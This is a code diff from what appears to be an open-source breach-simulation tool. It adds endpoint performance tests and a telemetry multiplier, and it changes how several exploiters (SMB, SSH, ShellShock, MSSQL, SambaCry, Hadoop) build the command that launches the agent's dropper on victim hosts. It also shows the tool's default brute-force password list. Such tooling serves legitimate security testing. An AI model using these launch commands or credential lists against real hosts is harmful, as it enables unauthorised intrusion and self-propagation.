from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
LOGGER = logging.getLogger(__name__)
class EndpointPerformanceTest(BasicTest):
def __init__(self, name, test_config: PerformanceTestConfig, island_client: MonkeyIslandClient):
self.name = name
self.test_config = test_config
self.island_client = island_client
def run(self) -> bool:
# Collect timings for all pages
endpoint_timings = {}
for endpoint in self.test_config.endpoints_to_test:
self.island_client.clear_caches()
endpoint_timings[endpoint] = self.island_client.requests.get_request_time(endpoint,
SupportedRequestMethod.GET)
analyzer = PerformanceAnalyzer(self.test_config, endpoint_timings)
return analyzer.analyze_test_results()

View File

@ -0,0 +1,35 @@
from datetime import timedelta
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
MAP_RESOURCES = [
"api/netmap",
]
class MapGenerationTest(PerformanceTest):
TEST_NAME = "Map generation performance test"
def __init__(self, island_client, config_parser, analyzers,
timeout, log_handler, break_on_timeout):
self.island_client = island_client
self.config_parser = config_parser
exploitation_test = ExploitationTest(MapGenerationTest.TEST_NAME, island_client,
config_parser, analyzers, timeout, log_handler)
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
endpoints_to_test=MAP_RESOURCES,
break_on_timeout=break_on_timeout)
self.performance_test_workflow = PerformanceTestWorkflow(MapGenerationTest.TEST_NAME,
exploitation_test,
performance_config)
def run(self):
self.performance_test_workflow.run()

View File

@ -0,0 +1,32 @@
from datetime import timedelta
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \
TelemetryPerformanceTestWorkflow
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
MAP_RESOURCES = [
"api/netmap",
]
class MapGenerationFromTelemetryTest(PerformanceTest):
TEST_NAME = "Map generation from fake telemetries test"
def __init__(self, island_client, quick_performance_test: bool, break_on_timeout=False):
self.island_client = island_client
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
endpoints_to_test=MAP_RESOURCES,
break_on_timeout=break_on_timeout)
self.performance_test_workflow = TelemetryPerformanceTestWorkflow(MapGenerationFromTelemetryTest.TEST_NAME,
self.island_client,
performance_config,
quick_performance_test)
def run(self):
self.performance_test_workflow.run()

View File

@ -0,0 +1,16 @@
from abc import ABCMeta, abstractmethod
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
class PerformanceTest(BasicTest, metaclass=ABCMeta):
@abstractmethod
def __init__(self, island_client, config_parser, analyzers,
timeout, log_handler, break_on_timeout):
pass
@property
@abstractmethod
def TEST_NAME(self):
pass

View File

@ -0,0 +1,12 @@
from datetime import timedelta
from typing import List
class PerformanceTestConfig:
def __init__(self, max_allowed_single_page_time: timedelta, max_allowed_total_time: timedelta,
endpoints_to_test: List[str] = None, break_on_timeout=False):
self.max_allowed_single_page_time = max_allowed_single_page_time
self.max_allowed_total_time = max_allowed_total_time
self.endpoints_to_test = endpoints_to_test
self.break_on_timeout = break_on_timeout

View File

@ -0,0 +1,35 @@
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
class PerformanceTestWorkflow(BasicTest):
def __init__(self, name, exploitation_test: ExploitationTest, performance_config: PerformanceTestConfig):
self.name = name
self.exploitation_test = exploitation_test
self.island_client = exploitation_test.island_client
self.config_parser = exploitation_test.config_parser
self.performance_config = performance_config
def run(self):
self.island_client.import_config(self.config_parser.config_raw)
self.exploitation_test.print_test_starting_info()
try:
self.island_client.run_monkey_local()
self.exploitation_test.test_until_timeout()
finally:
self.island_client.kill_all_monkeys()
self.exploitation_test.wait_until_monkeys_die()
self.exploitation_test.wait_for_monkey_process_to_finish()
if not self.island_client.is_all_monkeys_dead():
raise RuntimeError("Can't test report times since not all Monkeys have died.")
performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client)
try:
if not self.island_client.is_all_monkeys_dead():
raise RuntimeError("Can't test report times since not all Monkeys have died.")
assert performance_test.run()
finally:
self.exploitation_test.parse_logs()
self.island_client.reset_env()

View File

@ -0,0 +1,38 @@
from datetime import timedelta
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
REPORT_RESOURCES = [
"api/report/security",
"api/attack/report",
"api/report/zero_trust/findings",
"api/report/zero_trust/principles",
"api/report/zero_trust/pillars"
]
class ReportGenerationTest(PerformanceTest):
TEST_NAME = "Report generation performance test"
def __init__(self, island_client, config_parser, analyzers,
timeout, log_handler, break_on_timeout):
self.island_client = island_client
self.config_parser = config_parser
exploitation_test = ExploitationTest(ReportGenerationTest.TEST_NAME, island_client,
config_parser, analyzers, timeout, log_handler)
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
endpoints_to_test=REPORT_RESOURCES,
break_on_timeout=break_on_timeout)
self.performance_test_workflow = PerformanceTestWorkflow(ReportGenerationTest.TEST_NAME,
exploitation_test,
performance_config)
def run(self):
self.performance_test_workflow.run()

View File

@ -0,0 +1,36 @@
from datetime import timedelta
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \
TelemetryPerformanceTestWorkflow
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
REPORT_RESOURCES = [
"api/report/security",
"api/attack/report",
"api/report/zero_trust/findings",
"api/report/zero_trust/principles",
"api/report/zero_trust/pillars"
]
class ReportGenerationFromTelemetryTest(PerformanceTest):
TEST_NAME = "Map generation from fake telemetries test"
def __init__(self, island_client, quick_performance_test, break_on_timeout=False):
self.island_client = island_client
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
endpoints_to_test=REPORT_RESOURCES,
break_on_timeout=break_on_timeout)
self.performance_test_workflow = TelemetryPerformanceTestWorkflow(ReportGenerationFromTelemetryTest.TEST_NAME,
self.island_client,
performance_config,
quick_performance_test)
def run(self):
self.performance_test_workflow.run()

View File

@ -0,0 +1,47 @@
import json
import logging
from os import listdir, path
from typing import List, Dict
from tqdm import tqdm
TELEM_DIR_PATH = './tests/performance/telem_sample'
MAX_SAME_TYPE_TELEM_FILES = 10000
LOGGER = logging.getLogger(__name__)
class SampleFileParser:
@staticmethod
def save_teletries_to_files(telems: List[Dict]):
for telem in (tqdm(telems, desc="Telemetries saved to files", position=3)):
SampleFileParser.save_telemetry_to_file(telem)
@staticmethod
def save_telemetry_to_file(telem: Dict):
telem_filename = telem['name'] + telem['method']
for i in range(MAX_SAME_TYPE_TELEM_FILES):
if not path.exists(path.join(TELEM_DIR_PATH, (str(i) + telem_filename))):
telem_filename = str(i) + telem_filename
break
with open(path.join(TELEM_DIR_PATH, telem_filename), 'w') as file:
file.write(json.dumps(telem))
@staticmethod
def read_telem_files() -> List[str]:
telems = []
try:
file_paths = [path.join(TELEM_DIR_PATH, f) for f in listdir(TELEM_DIR_PATH)
if path.isfile(path.join(TELEM_DIR_PATH, f))]
except FileNotFoundError:
raise FileNotFoundError("Telemetries to send not found. "
"Refer to readme to figure out how to generate telemetries and where to put them.")
for file_path in file_paths:
with open(file_path, 'r') as telem_file:
telem_string = "".join(telem_file.readlines()).replace("\n", "")
telems.append(telem_string)
return telems
@staticmethod
def get_all_telemetries() -> List[Dict]:
return [json.loads(t) for t in SampleFileParser.read_telem_files()]

View File

@ -0,0 +1,25 @@
from typing import List
class FakeIpGenerator:
def __init__(self):
self.fake_ip_parts = [1, 1, 1, 1]
def generate_fake_ips_for_real_ips(self, real_ips: List[str]) -> List[str]:
fake_ips = []
for i in range(len(real_ips)):
fake_ips.append('.'.join(str(part) for part in self.fake_ip_parts))
self.increment_ip()
return fake_ips
def increment_ip(self):
self.fake_ip_parts[3] += 1
self.try_fix_ip_range()
def try_fix_ip_range(self):
for i in range(len(self.fake_ip_parts)):
if self.fake_ip_parts[i] > 256:
if i-1 < 0:
raise Exception("Fake IP's out of range.")
self.fake_ip_parts[i-1] += 1
self.fake_ip_parts[i] = 1

View File

@ -0,0 +1,18 @@
import random
from envs.monkey_zoo.blackbox.tests.performance.\
telem_sample_parsing.sample_multiplier.fake_ip_generator import FakeIpGenerator
class FakeMonkey:
def __init__(self, ips, guid, fake_ip_generator: FakeIpGenerator, on_island=False):
self.original_ips = ips
self.original_guid = guid
self.fake_ip_generator = fake_ip_generator
self.on_island = on_island
self.fake_guid = str(random.randint(1000000000000, 9999999999999)) # noqa: DUO102
self.fake_ips = fake_ip_generator.generate_fake_ips_for_real_ips(ips)
def change_fake_data(self):
self.fake_ips = self.fake_ip_generator.generate_fake_ips_for_real_ips(self.original_ips)
self.fake_guid = str(random.randint(1000000000000, 9999999999999)) # noqa: DUO102

View File

@ -0,0 +1,89 @@
import copy
import json
import logging
import sys
from typing import List, Dict
from tqdm import tqdm
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser
from envs.monkey_zoo.blackbox.tests.performance.\
telem_sample_parsing.sample_multiplier.fake_ip_generator import FakeIpGenerator
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import FakeMonkey
TELEM_DIR_PATH = './tests/performance/telemetry_sample'
LOGGER = logging.getLogger(__name__)
class SampleMultiplier:
def __init__(self, multiplier: int):
self.multiplier = multiplier
self.fake_ip_generator = FakeIpGenerator()
def multiply_telems(self):
telems = SampleFileParser.get_all_telemetries()
telem_contents = [json.loads(telem['content']) for telem in telems]
monkeys = self.get_monkeys_from_telems(telem_contents)
for i in tqdm(range(self.multiplier), desc="Batch of fabricated telemetries", position=1):
for monkey in monkeys:
monkey.change_fake_data()
fake_telem_batch = copy.deepcopy(telems)
SampleMultiplier.fabricate_monkeys_in_telems(fake_telem_batch, monkeys)
SampleMultiplier.offset_telem_times(iteration=i, telems=fake_telem_batch)
SampleFileParser.save_teletries_to_files(fake_telem_batch)
LOGGER.info("")
@staticmethod
def fabricate_monkeys_in_telems(telems: List[Dict], monkeys: List[FakeMonkey]):
for telem in tqdm(telems, desc="Telemetries fabricated", position=2):
for monkey in monkeys:
if monkey.on_island:
continue
if (monkey.original_guid in telem['content'] or monkey.original_guid in telem['endpoint']) \
and not monkey.on_island:
telem['content'] = telem['content'].replace(monkey.original_guid, monkey.fake_guid)
telem['endpoint'] = telem['endpoint'].replace(monkey.original_guid, monkey.fake_guid)
for i in range(len(monkey.original_ips)):
telem['content'] = telem['content'].replace(monkey.original_ips[i], monkey.fake_ips[i])
@staticmethod
def offset_telem_times(iteration: int, telems: List[Dict]):
for telem in telems:
telem['time']['$date'] += iteration * 1000
def get_monkeys_from_telems(self, telems: List[Dict]):
island_ips = SampleMultiplier.get_island_ips_from_telems(telems)
monkeys = []
for telem in [telem for telem in telems
if 'telem_category' in telem and telem['telem_category'] == 'system_info']:
if 'network_info' not in telem['data']:
continue
guid = telem['monkey_guid']
monkey_present = [monkey for monkey in monkeys if monkey.original_guid == guid]
if not monkey_present:
ips = [net_info['addr'] for net_info in telem['data']['network_info']['networks']]
if set(island_ips).intersection(ips):
on_island = True
else:
on_island = False
monkeys.append(FakeMonkey(ips=ips,
guid=guid,
fake_ip_generator=self.fake_ip_generator,
on_island=on_island))
return monkeys
@staticmethod
def get_island_ips_from_telems(telems: List[Dict]) -> List[str]:
island_ips = []
for telem in telems:
if 'config' in telem:
island_ips = telem['config']['command_servers']
for i in range(len(island_ips)):
island_ips[i] = island_ips[i].replace(":5000", "")
return island_ips
if __name__ == "__main__":
SampleMultiplier(multiplier=int(sys.argv[1])).multiply_telems()

View File

@ -0,0 +1,19 @@
from unittest import TestCase
from envs.monkey_zoo.blackbox.tests.performance.\
telem_sample_parsing.sample_multiplier.fake_ip_generator import FakeIpGenerator
class TestFakeIpGenerator(TestCase):
def test_fake_ip_generation(self):
fake_ip_gen = FakeIpGenerator()
self.assertListEqual([1, 1, 1, 1], fake_ip_gen.fake_ip_parts)
for i in range(256):
fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1'])
self.assertListEqual(['1.1.2.1'], fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1']))
fake_ip_gen.fake_ip_parts = [256, 256, 255, 256]
self.assertListEqual(['256.256.255.256', '256.256.256.1'],
fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1', '1.1.1.2']))
fake_ip_gen.fake_ip_parts = [256, 256, 256, 256]
self.assertRaises(Exception, fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1']))

View File

@ -0,0 +1,55 @@
import json
import logging
from datetime import timedelta
from tqdm import tqdm
from envs.monkey_zoo.blackbox.analyzers.performance_analyzer import PerformanceAnalyzer
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser
LOGGER = logging.getLogger(__name__)
MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=60)
class TelemetryPerformanceTest:
def __init__(self, island_client: MonkeyIslandClient, quick_performance_test: bool):
self.island_client = island_client
self.quick_performance_test = quick_performance_test
def test_telemetry_performance(self):
LOGGER.info("Starting telemetry performance test.")
try:
all_telemetries = SampleFileParser.get_all_telemetries()
except FileNotFoundError:
raise FileNotFoundError("Telemetries to send not found. "
"Refer to readme to figure out how to generate telemetries and where to put them.")
LOGGER.info("Telemetries imported successfully.")
all_telemetries.sort(key=lambda telem: telem['time']['$date'])
telemetry_parse_times = {}
for telemetry in tqdm(all_telemetries, total=len(all_telemetries), ascii=True, desc="Telemetries sent"):
telemetry_endpoint = TelemetryPerformanceTest.get_verbose_telemetry_endpoint(telemetry)
telemetry_parse_times[telemetry_endpoint] = self.get_telemetry_time(telemetry)
test_config = PerformanceTestConfig(MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME, MAX_ALLOWED_TOTAL_TIME)
PerformanceAnalyzer(test_config, telemetry_parse_times).analyze_test_results()
if not self.quick_performance_test:
self.island_client.reset_env()
def get_telemetry_time(self, telemetry):
content = telemetry['content']
url = telemetry['endpoint']
method = SupportedRequestMethod.__getattr__(telemetry['method'])
return self.island_client.requests.get_request_time(url=url, method=method, data=content)
@staticmethod
def get_verbose_telemetry_endpoint(telemetry):
telem_category = ""
if "telem_category" in telemetry['content']:
telem_category = "_" + json.loads(telemetry['content'])['telem_category'] + "_" + telemetry['_id']['$oid']
return telemetry['endpoint'] + telem_category

View File

@ -0,0 +1,25 @@
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import TelemetryPerformanceTest
class TelemetryPerformanceTestWorkflow(BasicTest):
def __init__(self, name, island_client, performance_config: PerformanceTestConfig, quick_performance_test):
self.name = name
self.island_client = island_client
self.performance_config = performance_config
self.quick_performance_test = quick_performance_test
def run(self):
try:
if not self.quick_performance_test:
telem_sending_test = TelemetryPerformanceTest(island_client=self.island_client,
quick_performance_test=self.quick_performance_test)
telem_sending_test.test_telemetry_performance()
performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client)
assert performance_test.run()
finally:
if not self.quick_performance_test:
self.island_client.reset_env()

View File

@ -1,6 +1,5 @@
import subprocess
import logging
import subprocess
LOGGER = logging.getLogger(__name__)
@ -16,10 +15,10 @@ class GCPHandler(object):
self.zone = zone
try:
# pass the key file to gcp
subprocess.call(GCPHandler.get_auth_command(key_path), shell=True)
subprocess.call(GCPHandler.get_auth_command(key_path), shell=True) # noqa: DUO116
LOGGER.info("GCP Handler passed key")
# set project
subprocess.call(GCPHandler.get_set_project_command(project_id), shell=True)
subprocess.call(GCPHandler.get_set_project_command(project_id), shell=True) # noqa: DUO116
LOGGER.info("GCP Handler set project")
LOGGER.info("GCP Handler initialized successfully")
except Exception as e:
@ -33,14 +32,14 @@ class GCPHandler(object):
"""
LOGGER.info("Setting up all GCP machines...")
try:
subprocess.call((GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True)
subprocess.call((GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True) # noqa: DUO116
LOGGER.info("GCP machines successfully started.")
except Exception as e:
LOGGER.error("GCP Handler failed to start GCP machines: %s" % e)
def stop_machines(self, machine_list):
try:
subprocess.call((GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True)
subprocess.call((GCPHandler.MACHINE_STOPPING_COMMAND % (machine_list, self.zone)), shell=True) # noqa: DUO116
LOGGER.info("GCP machines stopped successfully.")
except Exception as e:
LOGGER.error("GCP Handler failed to stop network machines: %s" % e)

View File

@ -1,4 +1,5 @@
import json
from bson import ObjectId

View File

@ -57,6 +57,3 @@ class TestOSCompatibility(object):
if len(ips_that_communicated) < len(machine_list):
assert False

View File

@ -0,0 +1,12 @@
from urllib.parse import urlparse
def get_host_from_network_location(network_location: str) -> str:
"""
URL structure is "<scheme>://<net_loc>/<path>;<params>?<query>#<fragment>" (https://tools.ietf.org/html/rfc1808.html)
And the net_loc is "<user>:<password>@<host>:<port>" (https://tools.ietf.org/html/rfc1738#section-3.1)
:param network_location: server network location
:return: host part of the network location
"""
url = urlparse("http://" + network_location)
return str(url.hostname)

View File

@ -0,0 +1,12 @@
from unittest import TestCase
from common.network.network_utils import get_host_from_network_location
class TestNetworkUtils(TestCase):
def test_remove_port_from_ip_string(self):
assert get_host_from_network_location("127.0.0.1:12345") == "127.0.0.1"
assert get_host_from_network_location("127.0.0.1:12345") == "127.0.0.1"
assert get_host_from_network_location("127.0.0.1") == "127.0.0.1"
assert get_host_from_network_location("www.google.com:8080") == "www.google.com"
assert get_host_from_network_location("user:password@host:8080") == "host"

View File

@ -1,5 +1,7 @@
import wmi
import win32com
import sys
if sys.platform == 'win32':
import win32com
import wmi
__author__ = 'maor.rayzin'

View File

@ -1,25 +0,0 @@
import winreg
from common.utils.mongo_utils import MongoUtils
__author__ = 'maor.rayzin'
class RegUtils:
def __init__(self):
# Static class
pass
@staticmethod
def get_reg_key(subkey_path, store=winreg.HKEY_LOCAL_MACHINE):
key = winreg.ConnectRegistry(None, store)
subkey = winreg.OpenKey(key, subkey_path)
d = dict([winreg.EnumValue(subkey, i)[:2] for i in range(winreg.QueryInfoKey(subkey)[0])])
d = MongoUtils.fix_obj_for_mongo(d)
subkey.Close()
key.Close()
return d

View File

@ -4,7 +4,7 @@ from pathlib import Path
MAJOR = "1"
MINOR = "8"
PATCH = "1"
PATCH = "2"
build_file_path = Path(__file__).parent.joinpath("BUILD")
with open(build_file_path, "r") as build_file:
BUILD = build_file.read()

View File

@ -13,6 +13,7 @@ GUID = str(uuid.getnode())
EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'monkey.bin')
SENSITIVE_FIELDS = ["exploit_password_list", "exploit_user_list", "exploit_ssh_keys"]
LOCAL_CONFIG_VARS = ["name", "id", "current_server", "max_depth"]
HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden"
@ -22,14 +23,17 @@ class Configuration(object):
for key, value in list(formatted_data.items()):
if key.startswith('_'):
continue
if key in ["name", "id", "current_server"]:
if key in LOCAL_CONFIG_VARS:
continue
if self._depth_from_commandline and key == "depth":
self.max_depth = value
continue
if hasattr(self, key):
setattr(self, key, value)
else:
unknown_items.append(key)
if not self.max_depth:
self.max_depth = self.depth
return unknown_items
def from_json(self, json_data):
@ -135,6 +139,8 @@ class Configuration(object):
# depth of propagation
depth = 2
max_depth = None
started_on_island = False
current_server = ""
# Configuration servers to try to connect to, in this order.
@ -232,6 +238,18 @@ class Configuration(object):
cred_list.append(cred)
return cred_list
@staticmethod
def hash_sensitive_data(sensitive_data):
"""
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data plain-text, as the log is
saved on client machines plain-text.
:param sensitive_data: the data to hash.
:return: the hashed data.
"""
password_hashed = hashlib.sha512(sensitive_data.encode()).hexdigest()
return password_hashed
exploit_user_list = ['Administrator', 'root', 'user']
exploit_password_list = ["Password1!", "1234", "password", "12345678"]
exploit_lm_hash_list = []
@ -259,23 +277,22 @@ class Configuration(object):
extract_azure_creds = True
###########################
# post breach actions
###########################
post_breach_actions = []
custom_PBA_linux_cmd = ""
custom_PBA_windows_cmd = ""
PBA_linux_filename = None
PBA_windows_filename = None
@staticmethod
def hash_sensitive_data(sensitive_data):
"""
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data plain-text, as the log is
saved on client machines plain-text.
###########################
# testing configuration
###########################
export_monkey_telems = False
:param sensitive_data: the data to hash.
:return: the hashed data.
"""
password_hashed = hashlib.sha512(sensitive_data.encode()).hexdigest()
return password_hashed
def get_hop_distance_to_island(self):
return self.max_depth - self.depth
WormConfiguration = Configuration()

View File

@ -15,6 +15,8 @@ from infection_monkey.transport.tcp import TcpProxy
__author__ = 'hoffer'
from infection_monkey.utils.exceptions.planned_shutdown_exception import PlannedShutdownException
requests.packages.urllib3.disable_warnings()
LOG = logging.getLogger(__name__)
@ -321,3 +323,29 @@ class ControlClient(object):
proxies=ControlClient.proxies)
except requests.exceptions.RequestException:
return False
@staticmethod
def should_monkey_run(vulnerable_port: str) -> bool:
if vulnerable_port and \
WormConfiguration.get_hop_distance_to_island() > 1 and \
ControlClient.can_island_see_port(vulnerable_port) and \
WormConfiguration.started_on_island:
raise PlannedShutdownException("Monkey shouldn't run on current machine "
"(it will be exploited later with more depth).")
return True
@staticmethod
def can_island_see_port(port):
try:
url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}"
response = requests.get(url, verify=False)
response = json.loads(response.content.decode())
return response['status'] == "port_visible"
except requests.exceptions.RequestException:
return False
@staticmethod
def report_start_on_island():
requests.post(f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island",
data=json.dumps({'started_on_island': True}),
verify=False)
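Editor's note: the three ControlClient additions above implement an early-exit optimization. An agent started directly on the island reports that fact, and a freshly dropped agent asks the island whether it can still reach the agent's vulnerable port; if so, the agent shuts down because the machine will be exploited again later at a greater depth. A sketch of the agent-side check follows; the island address 10.0.0.1:5000 is a placeholder, not taken from this diff:

import json

import requests

ISLAND_SERVER = "10.0.0.1:5000"  # placeholder for WormConfiguration.current_server

def can_island_see_port(port: int) -> bool:
    # Mirrors ControlClient.can_island_see_port above: the island answers
    # {"status": "port_visible"} when it can open a TCP connection back to the
    # caller on that port (see the RemotePortCheck resource later in this diff).
    url = f"https://{ISLAND_SERVER}/api/monkey_control/check_remote_port/{port}"
    try:
        response = requests.get(url, verify=False, timeout=5)  # noqa: DUO123
        return json.loads(response.content.decode())["status"] == "port_visible"
    except requests.exceptions.RequestException:
        return False

print(can_island_see_port(445))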


@ -44,6 +44,7 @@ class MonkeyDrops(object):
arg_parser.add_argument('-s', '--server')
arg_parser.add_argument('-d', '--depth', type=int)
arg_parser.add_argument('-l', '--location')
arg_parser.add_argument('-vp', '--vulnerable-port')
self.monkey_args = args[1:]
self.opts, _ = arg_parser.parse_known_args(args)
@ -115,7 +116,12 @@ class MonkeyDrops(object):
LOG.warning("Cannot set reference date to destination file")
monkey_options = \
build_monkey_commandline_explicitly(self.opts.parent, self.opts.tunnel, self.opts.server, self.opts.depth)
build_monkey_commandline_explicitly(parent=self.opts.parent,
tunnel=self.opts.tunnel,
server=self.opts.server,
depth=self.opts.depth,
location=None,
vulnerable_port=self.opts.vulnerable_port)
if OperatingSystem.Windows == SystemInfoCollector.get_os():
monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': self._config['destination_path']} + monkey_options


@ -73,7 +73,8 @@ class HadoopExploiter(WebRCE):
def build_command(self, path, http_path):
# Build command to execute
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1,
vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0])
if 'linux' in self.host.os['type']:
base_command = HADOOP_LINUX_COMMAND
else:


@ -133,6 +133,7 @@ class MSSQLExploiter(HostExploiter):
# Form monkey's launch command
monkey_args = build_monkey_commandline(self.host,
get_monkey_depth() - 1,
MSSQLExploiter.SQL_DEFAULT_TCP_PORT,
dst_path)
suffix = ">>{}".format(self.payload_file_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX


@ -329,7 +329,10 @@ class SambaCryExploiter(HostExploiter):
return open(get_binary_file_path(self.SAMBACRY_RUNNER_FILENAME_64), "rb")
def get_monkey_commandline_file(self, location):
return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host, get_monkey_depth() - 1, str(location)))
return BytesIO(DROPPER_ARG + build_monkey_commandline(self.host,
get_monkey_depth() - 1,
SambaCryExploiter.SAMBA_PORT,
str(location)))
@staticmethod
def is_share_writable(smb_client, share):


@ -144,7 +144,11 @@ class ShellShockExploiter(HostExploiter):
# run the monkey
cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_target_path_linux) + ' & '
cmdline += build_monkey_commandline(self.host,
get_monkey_depth() - 1,
HTTPTools.get_port_from_url(url),
dropper_target_path_linux)
cmdline += ' & '
run_path = exploit + cmdline
self.attack_page(url, header, run_path)


@ -6,7 +6,7 @@ from impacket.smbconnection import SMB_DIALECT
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
from infection_monkey.exploit.tools.smb_tools import SmbTools
from infection_monkey.model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDLINE_DETACHED_WINDOWS
from infection_monkey.model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDLINE_DETACHED_WINDOWS, VictimHost
from infection_monkey.network.smbfinger import SMBFinger
from infection_monkey.network.tools import check_tcp_port
from common.utils.exploit_enum import ExploitType
@ -28,6 +28,7 @@ class SmbExploiter(HostExploiter):
def __init__(self, host):
super(SmbExploiter, self).__init__(host)
self.vulnerable_port = None
def is_os_supported(self):
if super(SmbExploiter, self).is_os_supported():
@ -99,14 +100,18 @@ class SmbExploiter(HostExploiter):
LOG.debug("Exploiter SmbExec is giving up...")
return False
self.set_vulnerable_port(self.host)
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1,
self.vulnerable_port,
self._config.dropper_target_path_win_32)
else:
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1)
build_monkey_commandline(self.host,
get_monkey_depth() - 1,
vulnerable_port=self.vulnerable_port)
smb_conn = False
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
@ -158,3 +163,11 @@ class SmbExploiter(HostExploiter):
self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1],
SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1]))
return True
def set_vulnerable_port(self, host: VictimHost):
if 'tcp-445' in self.host.services:
self.vulnerable_port = "445"
elif 'tcp-139' in self.host.services:
self.vulnerable_port = "139"
else:
self.vulnerable_port = None


@ -179,7 +179,9 @@ class SSHExploiter(HostExploiter):
try:
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
cmdline += build_monkey_commandline(self.host,
get_monkey_depth() - 1,
vulnerable_port=SSH_PORT)
cmdline += " > /dev/null 2>&1 &"
